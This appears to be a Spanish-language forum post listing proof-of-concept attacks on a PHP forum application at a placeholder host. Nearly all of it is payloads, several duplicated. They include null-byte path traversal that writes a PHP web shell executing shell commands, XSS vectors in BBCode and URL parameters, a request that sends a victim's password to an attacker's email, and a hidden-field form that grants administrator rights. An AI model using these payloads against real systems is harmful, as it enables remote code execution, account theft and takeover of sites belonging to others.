Autor
Código:
PoC:
http://www.server.com/action.php?action=npost
POST:
fid=../rshell.php%00
tid=<?php system($_GET['c']);?>
txt=tmp
http://www.server.com/action.php?action=npost
POST:
fid=../rshell.php%00
tid=<?php system($_GET['c']);?>
txt=tmp
Código:
http://www.server.com/split.php?action=split&f=/../rshell.php%00&t=<?php system($_GET['c']);?>&p=<?php system($_GET['c']);?>
XSS, aun con magic_quotes:
Código:
PoC:
[a]' style='top:epresionje(eval(this.sss));' sss='alert();[/a]
[img]javascript:alert();[/img]
[a]' style='top:epresionje(eval(this.sss));' sss='alert();[/a]
[img]javascript:alert();[/img]
XSS.
Código:
PoC:
http://www.server.com/header.php?siteName=<XSS>&title=<XSS>&style=<XSS>
http://www.server.com/header.php?siteName=<XSS>&title=<XSS>&style=<XSS>
Código:
PoC:
http://www.server.com/search.php?query=<XSS>
http://www.server.com/search.php?query=<XSS>
Password Disclosure:
Código:
http://www.server.com/error.php?err=200&uname=victim&email=attacker@mail.com
Admin Maker xD
Código:
PoC:
<FORM action=updatepf.php method=post enctype="multipart/form-data">
NOM:<INPUT name=uname><br>
<INPUT type=file name=userfile><br>
MAIL: <INPUT type=text name=email>
<input type=hidden name=makeadmin value=true>
<input type=hidden name=stat value=true>
<input type=hidden name=ulang value=en>
<input type=hidden name=uskin value=default>
<INPUT type=submit value="Enviar consulta">
</FORM>
<FORM action=updatepf.php method=post enctype="multipart/form-data">
NOM:<INPUT name=uname><br>
<INPUT type=file name=userfile><br>
MAIL: <INPUT type=text name=email>
<input type=hidden name=makeadmin value=true>
<input type=hidden name=stat value=true>
<input type=hidden name=ulang value=en>
<input type=hidden name=uskin value=default>
<INPUT type=submit value="Enviar consulta">
</FORM>
En línea
